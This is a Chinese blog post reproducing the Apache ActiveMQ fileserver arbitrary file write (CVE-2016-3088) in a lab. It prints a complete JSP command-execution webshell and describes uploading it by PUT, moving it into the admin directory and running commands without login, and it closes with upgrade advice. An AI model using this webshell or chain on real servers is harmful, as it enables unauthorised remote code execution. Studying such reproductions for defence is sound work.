Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

 更新时间:2019年08月07日 14:06:44   作者:雨中落叶  
这篇文章主要介绍了Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现,需要的朋友可以参考下

一、漏洞描述

该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。

二、漏洞影响版本

Apache ActiveMQ 5.0.0 - 5.13.2

三、漏洞环境搭建

1、官网下载apache-activemq-5.7.0-bin.tar 下载地址:http://activemq.apache.org/download-archives.html

2、解压

3、启动,进入bin目录下,运行./activemq start

  

4、浏览器访问http://192.168.10.149:8161/,如下图可以看到成功搭建环境

  

四、漏洞复现

1、PUT上传一个jsp的webshell到fileserver目录,下图可以看到成功上传jsp文件

Jsp文件内容:

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

  

2、浏览器访问http://192.168.10.149:8161/fileserver/1.jsp,下图可以看到fileserver目录下的webshell没有被解析,说明fileserver目录没有执行权限

  

3、利用该版本存在物理路径泄露漏洞,爆一下绝对路径

  

4、利用Move方法将webshell移入admin目录下,如下图所示成功把文件移入到admin目录

  

5、利用该版本存在的未授权访问漏洞,不用登录,访问http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下图可以看到成功执行命令

  

五、漏洞防御

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

---------------------------------------------------------------------------------

参考: https://www.secpulse.com/archives/60064.html

总结

以上所述是小编给大家介绍的Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对脚本之家网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

相关文章

  • Ubuntu上使用Netdata设置实时性能监控的详细流程

    Ubuntu上使用Netdata设置实时性能监控的详细流程

    Netdata通过可扩展的Web仪表板提供准确的性能监控,可以显示Linux系统上的流程和服务。这篇文章给大家介绍Ubuntu上使用Netdata设置实时性能监控的流程,感兴趣的朋友一起看看吧
    2018-08-08
  • Linux使用crontab定时执行脚本任务的流程详解

    Linux使用crontab定时执行脚本任务的流程详解

    在Linux中可以使用crontab来定时执行脚本,crontab是一个用于管理定时任务的工具,可以让在特定的时间间隔内自动运行脚本或命令,本文我们将使用cron来定期执行一个写入命令或脚本,需要的朋友可以参考下
    2023-10-10
  • 安装Ubuntu 20.04后要做的事(小白教程)

    安装Ubuntu 20.04后要做的事(小白教程)

    这篇文章主要介绍了安装Ubuntu 20.04后要做的事(小白教程),文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2020-05-05
  • apache配置开启网站服务步骤

    apache配置开启网站服务步骤

    apache配置开启网站服务步骤,需要的朋友可以参考下。
    2010-06-06
  • Linux上通过SSH挂载远程文件系统方法详解

    Linux上通过SSH挂载远程文件系统方法详解

    在本篇内容里小编给大家整理了关于在Linux上通过SSH挂载远程文件系统的相关知识点,需要的朋友们跟着学习下。
    2019-03-03
  • bash脚本中将密码传递给ssh/scp命令方法详解

    bash脚本中将密码传递给ssh/scp命令方法详解

    在本篇内容里小编给大家整理了关于bash脚本中将密码传递给ssh/scp命令的相关方法和知识点,需要的朋友们学习下。
    2019-03-03
  • 浅谈Linux环境下gcc优化级别

    浅谈Linux环境下gcc优化级别

    这篇文章主要介绍了Linux环境下gcc优化级别,涉及gcc系列的相关内容,具有一定参考价值,需要的朋友可以了解下。
    2017-09-09
  • LNMP系列教程之 设置404错误页面

    LNMP系列教程之 设置404错误页面

    在之前的文章中分享到”设置301重定向的方法“文章,提到301,那肯定也要说说404错误页面吧。因为我们默认安装了LNMP后404页面不会自动设置,也不会默认到程序的404错误页面,而需要我们手工设置
    2012-09-09
  • Centos 6.8编译安装LNMP环境(Nginx+MySQL+PHP)教程

    Centos 6.8编译安装LNMP环境(Nginx+MySQL+PHP)教程

    这篇文章主要介绍了关于CentOS 6.8中编译安装LNMP环境的相关资料,LNMP即Linux,Nginx,MySQL,PHP,文中通过一步步的步骤介绍的非常详细,需要的朋友可以参考借鉴,下面来一起看看吧。
    2017-03-03
  • CentOS7使用yum安装PostgreSQL和PostGIS的方法

    CentOS7使用yum安装PostgreSQL和PostGIS的方法

    这篇文章主要介绍了CentOS7使用yum安装PostgreSQL和PostGIS的方法,非常不错,具有一定的参考借鉴价值,需要的朋友可以参考下
    2019-09-09

最新评论